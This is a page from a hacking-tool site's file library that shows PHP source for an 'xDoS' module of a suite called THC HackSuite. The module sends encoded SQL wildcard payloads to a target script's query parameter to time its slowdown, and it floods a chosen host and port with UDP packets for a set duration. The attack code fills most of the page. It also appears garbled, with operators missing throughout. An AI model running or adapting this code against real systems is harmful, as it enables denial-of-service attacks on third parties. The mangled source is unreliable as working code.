random gallery image
random tutorial
preview

..we are going to create a new app for the hacksuite. We're not going to do anything fancy here, we will make a simple app to get familiar how to write compatible scripts for the..

read more

random debugging
xAnalyze

xAnalyze is a module that can search through corrupt data and configuration files in order to find the exact position of errors

more about this module
more of this category
more modules

HackSuite File Library
File Library
Here you can find the latest files and structure of the THC HackSuite, note that if you have an earlier version of the suite it's not recommended to update files manually. Instead you should overwrite your existing HackSuite environment.
<?php
/* Handler for xDoS

Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 16-04-2015
*/
set_time_limit(0);
ignore_user_abort(true);
// set variable to be able to save a task
$_MODULE_C "thc_xd";
include_once(
"../../Includes/screen_header.php");
include_once(
$_PATHS['style_root']."/screen.php");
include_once(
$_PATHS['functions_root']."/scrn.php");
// options
$sOptions "<b>logging:</b> ".($_CONTEXT['log']==true "on" "off")."<br>\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true "on" "off")."<br>\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true "on" "off")."\n";
if(isset(
$_POST['sVar'])){
    
/*
    Attempt to see whether a script could be vulnerable to wildcard attacks.
    For best results you should try this on a script that searches a huge amount of records.
    More info: https://www.owasp.org/index.php/Testing_for_SQL_Wildcard_Attacks_%28OWASP-DS-001%29
    */
    
$aUrl = @parse_url($_POST['sUrl']);
    if(!isset(
$aUrl['host']) || $aUrl['host']==""){
        die(
Screen($sOut."Invalid host or ip address".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    if(!isset(
$aUrl['path']) || $aUrl['path']==""){
        die(
Screen($sOut."Invalid path to script".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    if(!isset(
$aUrl['query']) || $aUrl['query']==""){
        die(
Screen($sOut."Invalid query to poison".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    
$_POST['sVar'] = trim($_POST['sVar']);
    if(!
preg_match('/^([0-9a-z\-_])$/i',$_POST['sVar'])){
        die(
Screen($sOut."Invalid variable name structure".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    
$_POST['iDelay'] = intval(trim($_POST['iDelay']));
    if(
$_POST['iDelay']<0){
        
// really funny, you should become a comedian or something..
        
$_POST['iDelay'] = 0;
    }
    
$_POST['iCache'] = !isset($_POST['iCache']) ? 1;
    if(!
preg_match('/^([0-9a-z\-_])$/i',$_POST['sVar'])){
        die(
Screen($sOut."Invalid variable name structure".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    
// get is always default
    
$_POST['sMethod'] = @$_POST['sMethod']!="post" "GET" "POST";
    
// create benchmark properties
    
$_CONTEXT['benchmarks'] = array();
    
$_CONTEXT['benchmarks']['test'] = array();
    
$_CONTEXT['benchmarks']['test']['payload'] = array();
    
$_CONTEXT['benchmarks']['test']['payload'][0] = "test1";
    
$_CONTEXT['benchmarks']['test']['payload'][1] = "test2";
    
$_CONTEXT['benchmarks']['test']['query'] = array();
    
$_CONTEXT['benchmarks']['test']['query'][0] = "";
    
$_CONTEXT['benchmarks']['test']['query'][1] = "";
    
$_CONTEXT['benchmarks']['test']['results'] = array();
    
$_CONTEXT['benchmarks']['wildcards'] = array();
    
$_CONTEXT['benchmarks']['wildcards']['payload'] = array();
    
$_CONTEXT['benchmarks']['wildcards']['payload'][0] = "'%64_[^!_%65/%ab?F%64_D)_(F%64)_%36([)({}%33){()}£$&N%55_)$*£()$*R\"_)][%55](%66[x])%ba][\$*\"£$-9]_%54'";
    
$_CONTEXT['benchmarks']['wildcards']['payload'][1] = "'%64_[^!_%65/%aa?F%64_D)_(F%64)_%36([)({}%33){()}£$&N%55_)$*£()$*R\"_)][%55](%66[x])%ba][\$*\"£$-9]_%54'";
    
$_CONTEXT['benchmarks']['wildcards']['query'] = array();
    
$_CONTEXT['benchmarks']['wildcards']['query'][0] = "";
    
$_CONTEXT['benchmarks']['wildcards']['query'][1] = "";
    
$_CONTEXT['benchmarks']['wildcards']['results'] = array();
    
// make sure the variable exists in the url
    
$aQuery = @explode("&",$aUrl['query']);
    
$bValid false;
    for(
$x=0;$x<count($aQuery);$x++){
        
// construct search queries
        
if($x!=0){
            
$_CONTEXT['benchmarks']['test']['query'][0] .= "&";
            
$_CONTEXT['benchmarks']['test']['query'][1] .= "&";
            
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= "&";
            
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= "&";
        }
        
$aVarValue explode("=",$aQuery[$x]);
        
$_CONTEXT['benchmarks']['test']['query'][0] .= $aVarValue[0];
        
$_CONTEXT['benchmarks']['test']['query'][1] .= $aVarValue[0];
        
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= $aVarValue[0];
        
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= $aVarValue[0];
        if(
$aVarValue[0]==$_POST['sVar']){
            
$_CONTEXT['benchmarks']['test']['query'][0] .= "=".$_CONTEXT['benchmarks']['test']['payload'][0];
            
$_CONTEXT['benchmarks']['test']['query'][1] .= "=".$_CONTEXT['benchmarks']['test']['payload'][1];
            
$_CONTEXT['benchmarks']['wildcards']['query'][0] .= "=".$_CONTEXT['benchmarks']['wildcards']['payload'][0];
            
$_CONTEXT['benchmarks']['wildcards']['query'][1] .= "=".$_CONTEXT['benchmarks']['wildcards']['payload'][1];
            
$bValid true;
        }
    }
    if(!
$bValid){
        die(
Screen($sOut."Invalid query, expecting variable name in url".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    
// looks valid from here, let's see if the host is up before we start benchmarking
    
echo Screen($sOut."<b>".($_POST['iCache']=="Caching is enabled, sending two different queries per query type" "Both query types will be run two times")."</b><br /><br />\n",$_CONTEXT['verbose'],$_CONTEXT['silent']);
    
// host is up, start benchmarking
    
include_once($_PATHS['includes_root']."/task_start.php");
    
// every type of benchmark
    
foreach($_CONTEXT['benchmarks'] as $sType=>$aValues){
        
// amount of queries per benchmark
        
for($x=0;$x<2;$x++){
            echo 
"<p><b>".$sType."</b> - sending ".strtolower($_POST['sMethod'])." request ".($x+1)." to ".$aUrl['host']." ...please wait.</p><blockquote>";
            
$iStart microtime(true);
            
flush();
            
ob_flush();
            
$ch curl_init();
            if(
$_POST['sMethod']=="GET"){
                
curl_setopt($chCURLOPT_URL$aUrl['scheme']."://".$aUrl['host'].$aUrl['path']."?".$_CONTEXT['benchmarks'][$sType]['payload'][($_POST['iCache']==$x 0)]);
            }
            else{
                
curl_setopt($chCURLOPT_URL$aUrl['scheme']."://".$aUrl['host'].$aUrl['path']);
                
curl_setopt($chCURLOPT_POSTFIELDS$_CONTEXT['benchmarks'][$sType]['payload'][($_POST['iCache']==$x 0)]);
            }
            
curl_setopt($chCURLOPT_HEADERfalse);
            
curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
            
curl_setopt($chCURLOPT_USERAGENT'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101506 Ubuntu/10.04 (lucid) Firefox/3.6.13 GTB7.1');
            if(!
$sResult = @curl_exec($ch)){
                
// update entry in background task file
                
include_once($_PATHS['includes_root']."/task_end.php");
                die(
Screen("Can't get headers, are you sure the host is up?".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
            }
            
$_CONTEXT['benchmarks'][$sType]['results'][] = microtime(true) - $iStart;
            echo 
"<br />request completed in ".$_CONTEXT['benchmarks'][$sType]['results'][$x]." seconds<br/>";
            @
curl_close($ch);
            if(
$_POST['iDelay']!=0){
                echo 
"<br />waiting ".$_POST['iDelay']." second(s) for possible next request<br/>";
                
sleep($_POST['iDelay']);
            }
            echo
"</blockquote>\n";
        }
    }
    
// update entry in background task file
    
include_once($_PATHS['includes_root']."/task_end.php");
}
elseif(isset(
$_POST['iDuration'])){
    
/* sends udp packets to the specified host*/
    
echo $sOut;
    
$_POST['iDuration'] = @intval($_POST['iDuration']);
    if(
$_POST['iDuration']<1){
        die(
Screen("Invalid duration of udp scan".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    
$sIP = @gethostbyname($_POST['sHost']);
    
$aIP explode(".",$sIP);
    if(
count($aIP)!=4){
        die(
Screen("Failed to convert host to ip address".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    
$iPort = @intval($_POST['iPort']);
    if(
$iPort>&& $iPort<65355){
        include_once(
$_PATHS['module_default_root']."/poison.php");
    }
    else{
        die(
Screen("Invalid port number".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
    }
    
$iStart time();
    
$iEnd time()+$_POST['iDuration'];
    
$iScans 1;
    echo 
Screen("<p><b>initialising scan on host ".$sIP.":".$iPort."</b></p>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
    include_once(
$_PATHS['includes_root']."/task_start.php");
    while(
true){
        
flush();
        
ob_flush();
        
$sPayload Poison();
        echo 
Screen("<br /><b>connection ".$iScans.":</b> sending ".strlen($sPayload)." bytes of data - ",$_CONTEXT['verbose'],$_CONTEXT['silent']);
        
$fp = @fsockopen("udp://".$sIP,$iPort,$errno,$errstr,3);
        @
fwrite($fp,$sPayload);
        echo 
Screen("<b>".($errstr=="" "completed" $errstr)."</b>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
        
fclose($fp);
        if(
time()>=$iEnd){
            echo 
Screen("<p><b>reached total scan duration (".$_POST['iDuration']." second(s)), aborting now...</b></p>",$_CONTEXT['verbose'],$_CONTEXT['silent']);
            break;
        }
        
$iScans++;
    }
    
// update entry in background task file
    
include_once($_PATHS['includes_root']."/task_end.php");
    echo 
$sEnd;
}
else{
    echo 
$sOut;
    echo 
$sOptions;
    echo 
$sEnd;
    exit;
}
?>
powered by
site stats
cms statistics:
version: 0.6.0
downloads: 4030
native: 26
modules: 21
apps: 2
support development
It takes lots of calories in order to create new things for the hacksuite, so it would be grand if you could buy me a protein shake or extra energy to keep me going. Thanks!
disclaimer
We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!
Created by Remco Kouw. Powered by protein shakes and a high calorie diet.